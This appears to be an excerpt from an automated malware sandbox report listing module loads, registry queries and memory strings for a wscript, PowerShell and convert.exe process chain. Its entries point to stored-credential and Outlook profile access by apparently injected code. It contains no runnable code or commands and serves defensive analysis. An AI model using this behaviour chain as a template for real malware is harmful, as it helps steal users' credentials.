Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: ifsutil.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: osuninst.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\convert.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.2502842295.00007FFD34860000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000A.00000003.2629248061.0000000003729000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.00000000038D0000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000003.2627277075.000000000357A000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000A.00000002.2727778625.0000000003A6E000.00000040.00001000.00020000.00000000.sdmp, convert.exe, convert.exe, 00000013.00000003.2729543157.00000000032CB000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2733109530.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.00000000037FE000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2977110762.0000000003660000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdb source: convert.exe, 00000013.00000002.2977602776.0000000003C8C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002F44000.00000004.00000020.00020000.00000000.sdmp, mNqSPruzCXM.exe, 00000018.00000002.3537079576.000000000259C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3534781987.000000002F20C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.2445760088.000001B5F828C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2482456341.000001B5FFB40000.00000004.08000000.00040000.00000000.sdmp
